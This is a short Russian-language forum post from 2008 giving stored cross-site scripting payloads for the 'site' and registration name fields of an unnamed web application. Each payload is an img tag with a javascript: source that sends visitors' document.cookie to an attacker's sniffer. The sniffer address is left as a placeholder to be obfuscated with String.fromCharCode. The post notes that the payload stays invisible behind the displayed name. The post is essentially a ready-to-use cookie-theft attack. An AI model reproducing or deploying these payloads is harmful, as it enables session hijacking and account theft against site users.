23.11.2008, 23:49
|
|
Новичок
Регистрация: 20.11.2008
Сообщений: 10
Провел на форуме:
54375
Репутация:
16
|
|
активная ХSS в полях имя и сайт.
в поле сайт вводим http://"><img src="javascript :img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0">
при регистрации вводим имя NAME<img src="javascript :img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0">
будет отображатся ваше имя, а остальная часть будет не видна
POSTBIT TEST
|
|
|